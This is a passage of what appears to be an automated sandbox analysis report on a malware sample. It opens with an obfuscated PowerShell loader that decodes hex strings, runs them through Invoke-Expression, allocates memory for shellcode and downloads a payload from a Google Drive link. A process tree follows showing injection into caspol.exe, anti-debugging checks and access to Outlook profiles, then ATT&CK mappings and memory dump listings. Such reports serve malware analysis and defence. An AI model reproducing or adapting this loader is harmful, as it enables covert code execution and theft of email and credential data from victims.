'80B7B4BEB7B1A6B7B696B7BEB7B5B3A6B7';$polarisati9=HTB '9BBC9FB7BFBDA0AB9FBDB6A7BEB7';$Yardi0=HTB '9FAB96B7BEB7B5B3A6B786ABA2B7';$Yardi1=HTB '91BEB3A1A1FEF282A7B0BEBBB1FEF281B7B3BEB7B6FEF293BCA1BB91BEB3A1A1FEF293A7A6BD91BEB3A1A1';$Yardi2=HTB '9BBCA4BDB9B7';$Yardi3=HTB '82A7B0BEBBB1FEF29ABBB6B790AB81BBB5FEF29CB7A581BEBDA6FEF284BBA0A6A7B3BE';$Yardi4=HTB '84BBA0A6A7B3BE93BEBEBDB1';$Yardi5=HTB 'BCA6B6BEBE';$Yardi6=HTB '9CA682A0BDA6B7B1A684BBA0A6A7B3BE9FB7BFBDA0AB';$Yardi7=HTB '9B978A';$Yardi8=HTB '8E';$Rubefact=HTB '87819780E1E0';$Overp=HTB '91B3BEBE85BBBCB6BDA582A0BDB193';function fkp {Param ($Deysosp, $Emanatis) ;$viet0 =HTB 
'F69AB7AAB3B7F2EFF2FA8993A2A296BDBFB3BBBC8FE8E891A7A0A0B7BCA696BDBFB3BBBCFC95B7A693A1A1B7BFB0BEBBB7A1FAFBF2AEF285BAB7A0B7FF9DB0B8B7B1A6F2A9F2F68DFC95BEBDB0B3BE93A1A1B7BFB0BEAB91B3B1BAB7F2FF93BCB6F2F68DFC9EBDB1B3A6BBBDBCFC81A2BEBBA6FAF68BB3A0B6BBEAFB89FFE38FFC97A3A7B3BEA1FAF6A2BDBEB3A0BBA1B3A6BBE2FBF2AFFBFC95B7A686ABA2B7FAF6A2BDBEB3A0BBA1B3A6BBE3FB';&($Yardi7) $viet0;$viet5 = HTB 'F681B9A0BBB6A6F2EFF2F69AB7AAB3B7FC95B7A69FB7A6BABDB6FAF6A2BDBEB3A0BBA1B3A6BBE0FEF28986ABA2B7898F8FF292FAF6A2BDBEB3A0BBA1B3A6BBE1FEF2F6A2BDBEB3A0BBA1B3A6BBE6FBFB';&($Yardi7) $viet5;$viet1 = HTB 'A0B7A6A7A0BCF2F681B9A0BBB6A6FC9BBCA4BDB9B7FAF6BCA7BEBEFEF292FA8981ABA1A6B7BFFC80A7BCA6BBBFB7FC9BBCA6B7A0BDA281B7A0A4BBB1B7A1FC9AB3BCB6BEB780B7B48FFA9CB7A5FF9DB0B8B7B1A6F281ABA1A6B7BFFC80A7BCA6BBBFB7FC9BBCA6B7A0BDA281B7A0A4BBB1B7A1FC9AB3BCB6BEB780B7B4FAFA9CB7A5FF9DB0B8B7B1A6F29BBCA682A6A0FBFEF2FAF69AB7AAB3B7FC95B7A69FB7A6BABDB6FAF6A2BDBEB3A0BBA1B3A6BBE7FBFBFC9BBCA4BDB9B7FAF6BCA7BEBEFEF292FAF696B7ABA1BDA1A2FBFBFBFBFEF2F697BFB3BCB3A6BBA1FBFB';&($Yardi7) $viet1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $Pension,[Parameter(Position = 1)] [Type] $Mendic = [Void]);$viet2 = HTB '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';&($Yardi7) $viet2;$viet3 = HTB 'F680B7A1A7A0A0FC96B7B4BBBCB791BDBCA1A6A0A7B1A6BDA0FAF6A2BDBEB3A0BBA1B3A6BBE4FEF28981ABA1A6B7BFFC80B7B4BEB7B1A6BBBDBCFC91B3BEBEBBBCB591BDBCA4B7BCA6BBBDBCA18FE8E881A6B3BCB6B3A0B6FEF2F682B7BCA1BBBDBCFBFC81B7A69BBFA2BEB7BFB7BCA6B3A6BBBDBC94BEB3B5A1FAF6A2BDBEB3A0BBA1B3A6BBE5FB';&($Yardi7) $viet3;$viet4 = HTB 'F680B7A1A7A0A0FC96B7B4BBBCB79FB7A6BABDB6FAF68BB3A0B6BBE0FEF2F68BB3A0B6BBE1FEF2F69FB7BCB6BBB1FEF2F682B7BCA1BBBDBCFBFC81B7A69BBFA2BEB7BFB7BCA6B3A6BBBDBC94BEB3B5A1FAF6A2BDBEB3A0BBA1B3A6BBE5FB';&($Yardi7) $viet4;$viet5 = HTB 'A0B7A6A7A0BCF2F680B7A1A7A0A0FC91A0B7B3A6B786ABA2B7FAFB';&($Yardi7) $viet5 ;}$Monograms = HTB 'B9B7A0BCB7BEE1E0';$viet6 = HTB 
'F6A1B9A7B7A1A2F2EFF28981ABA1A6B7BFFC80A7BCA6BBBFB7FC9BBCA6B7A0BDA281B7A0A4BBB1B7A1FC9FB3A0A1BAB3BE8FE8E895B7A696B7BEB7B5B3A6B794BDA094A7BCB1A6BBBDBC82BDBBBCA6B7A0FAFAB4B9A2F2F69FBDBCBDB5A0B3BFA1F2F68BB3A0B6BBE6FBFEF2FA959686F292FA899BBCA682A6A08FFEF289879BBCA6E1E08FFEF289879BBCA6E1E08FFEF289879BBCA6E1E08FFBF2FA899BBCA682A6A08FFBFBFB';&($Yardi7) $viet6;$Twickplu = fkp $Yardi5 $Yardi6;$viet7 = HTB 'F680B7A1A6B7E1F2EFF2F6A1B9A7B7A1A2FC9BBCA4BDB9B7FA899BBCA682A6A08FE8E888B7A0BDFEF2E4E6E3FEF2E2AAE1E2E2E2FEF2E2AAE6E2FB';&($Yardi7) $viet7;$viet8 = HTB 'F680B7B3BEB0B7B6B7BFF2EFF2F6A1B9A7B7A1A2FC9BBCA4BDB9B7FA899BBCA682A6A08FE8E888B7A0BDFEF2E4E7E0E6E3E2EAEAFEF2E2AAE1E2E2E2FEF2E2AAE6FB';&($Yardi7) $viet8;$Strmerens13901 = 'https://drive.google.com/uc?export=download&id=1dzg1926pnDm935d_Cm4TREqzX4j7oxJl';$Strmerens13900 = HTB 'F69DA4B7A0A1A2B7BCB6B7F2EFF2FA9CB7A5FF9DB0B8B7B1A6F29CB7A6FC85B7B091BEBBB7BCA6FBFC96BDA5BCBEBDB3B681A6A0BBBCB5FAF681A6A0BFB7A0B7BCA1E3E1EBE2E3FB';$viet8 = HTB 'F680B7A1A6B7E0EFF6B7BCA4E8B3A2A2B6B3A6B3';&($Yardi7) $viet8;$Reste2=$Reste2+'\Apostils.dat';$Overspende='';if (-not(Test-Path $Reste2)) {while ($Overspende -eq '') {&($Yardi7) $Strmerens13900;Start-Sleep 5;}Set-Content $Reste2 $Overspende;}$Overspende = Get-Content $Reste2;$viet9 = HTB 'F6A4BBB7A6F2EFF28981ABA1A6B7BFFC91BDBCA4B7A0A68FE8E894A0BDBF90B3A1B7E4E681A6A0BBBCB5FAF69DA4B7A0A1A2B7BCB6B7FB';&($Yardi7) $viet9;$Overspende0 = HTB '8981ABA1A6B7BFFC80A7BCA6BBBFB7FC9BBCA6B7A0BDA281B7A0A4BBB1B7A1FC9FB3A0A1BAB3BE8FE8E891BDA2ABFAF6A4BBB7A6FEF2E2FEF2F2F680B7A1A6B7E1FEF2E4E6E3FB';&($Yardi7) $Overspende0;$Hier147=$viet.count-641;$Overspende1 = HTB '8981ABA1A6B7BFFC80A7BCA6BBBFB7FC9BBCA6B7A0BDA281B7A0A4BBB1B7A1FC9FB3A0A1BAB3BE8FE8E891BDA2ABFAF6A4BBB7A6FEF2E4E6E3FEF2F680B7B3BEB0B7B6B7BFFEF2F69ABBB7A0E3E6E5FB';&($Yardi7) $Overspende1;$Overspende2 = HTB 
'F681A6A0BDB5B3F2EFF28981ABA1A6B7BFFC80A7BCA6BBBFB7FC9BBCA6B7A0BDA281B7A0A4BBB1B7A1FC9FB3A0A1BAB3BE8FE8E895B7A696B7BEB7B5B3A6B794BDA094A7BCB1A6BBBDBC82BDBBBCA6B7A0FAFAB4B9A2F2F680A7B0B7B4B3B1A6F2F69DA4B7A0A2FBFEF2FA959686F292FA899BBCA682A6A08FFEF2899BBCA682A6A08FFEF2899BBCA682A6A08FFEF2899BBCA682A6A08FFEF2899BBCA682A6A08FFBF2FA899BBCA682A6A08FFBFBFB';&($Yardi7) $Overspende2;$Overspende3 = HTB 'F681A6A0BDB5B3FC9BBCA4BDB9B7FAF680B7A1A6B7E1FEF680B7B3BEB0B7B6B7BFFEF686A5BBB1B9A2BEA7FEE2FEE2FB';&($Yardi7) $Overspende3#"
          3⤵
          • Blocklisted process makes network request
          • Checks QEMU agent file
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:920
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe"
            4⤵
            • Checks QEMU agent file
            • Accesses Microsoft Outlook profiles
            • Suspicious use of NtCreateThreadExHideFromDebugger
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of AdjustPrivilegeToken
            • outlook_office_path
            • outlook_win_path
            PID:964

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Discovery

    Query Registry

    1
    T1012

    System Information Discovery

    2
    T1082

    Collection

    Email Collection

    1
    T1114

    Command and Control

    Web Service

    1
    T1102

    Downloads

    • memory/920-73-0x0000000077130000-0x00000000772B0000-memory.dmp
      Filesize

      1.5MB

    • memory/920-86-0x0000000077130000-0x00000000772B0000-memory.dmp
      Filesize

      1.5MB

    • memory/920-89-0x0000000077130000-0x00000000772B0000-memory.dmp
      Filesize

      1.5MB

    • memory/920-88-0x0000000005B60000-0x0000000009998000-memory.dmp
      Filesize

      62.2MB

    • memory/920-85-0x0000000077130000-0x00000000772B0000-memory.dmp
      Filesize

      1.5MB

    • memory/920-68-0x0000000073040000-0x00000000735EB000-memory.dmp
      Filesize

      5.7MB

    • memory/920-62-0x0000000000000000-mapping.dmp
    • memory/920-74-0x0000000077130000-0x00000000772B0000-memory.dmp
      Filesize

      1.5MB

    • memory/920-63-0x0000000075D01000-0x0000000075D03000-memory.dmp
      Filesize

      8KB

    • memory/920-69-0x0000000076F50000-0x00000000770F9000-memory.dmp
      Filesize

      1.7MB

    • memory/920-65-0x0000000073040000-0x00000000735EB000-memory.dmp
      Filesize

      5.7MB

    • memory/920-67-0x0000000005B60000-0x0000000009998000-memory.dmp
      Filesize

      62.2MB

    • memory/964-78-0x0000000076F50000-0x00000000770F9000-memory.dmp
      Filesize

      1.7MB

    • memory/964-81-0x0000000000400000-0x0000000000615000-memory.dmp
      Filesize

      2.1MB

    • memory/964-82-0x0000000000401000-0x0000000000615000-memory.dmp
      Filesize

      2.1MB

    • memory/964-72-0x00000000000C768E-mapping.dmp
    • memory/964-92-0x0000000077130000-0x00000000772B0000-memory.dmp
      Filesize

      1.5MB

    • memory/964-90-0x0000000076F50000-0x00000000770F9000-memory.dmp
      Filesize

      1.7MB

    • memory/964-87-0x0000000000620000-0x0000000004458000-memory.dmp
      Filesize

      62.2MB

    • memory/964-84-0x0000000000400000-0x0000000000430000-memory.dmp
      Filesize

      192KB

    • memory/964-80-0x0000000077130000-0x00000000772B0000-memory.dmp
      Filesize

      1.5MB

    • memory/964-93-0x0000000077130000-0x00000000772B0000-memory.dmp
      Filesize

      1.5MB

    • memory/964-75-0x0000000000620000-0x0000000004458000-memory.dmp
      Filesize

      62.2MB

    • memory/1636-54-0x0000000000000000-mapping.dmp
    • memory/1812-59-0x000007FEF3A60000-0x000007FEF45BD000-memory.dmp
      Filesize

      11.4MB

    • memory/1812-60-0x0000000002784000-0x0000000002787000-memory.dmp
      Filesize

      12KB

    • memory/1812-66-0x0000000002784000-0x0000000002787000-memory.dmp
      Filesize

      12KB

    • memory/1812-56-0x0000000000000000-mapping.dmp
    • memory/1812-61-0x000000001B730000-0x000000001BA2F000-memory.dmp
      Filesize

      3.0MB

    • memory/1812-91-0x000000000278B000-0x00000000027AA000-memory.dmp
      Filesize

      124KB

    • memory/1812-58-0x000007FEF45C0000-0x000007FEF4FE3000-memory.dmp
      Filesize

      10.1MB

    • memory/1812-64-0x000000000278B000-0x00000000027AA000-memory.dmp
      Filesize

      124KB

    • memory/1952-55-0x000007FEFB971000-0x000007FEFB973000-memory.dmp
      Filesize

      8KB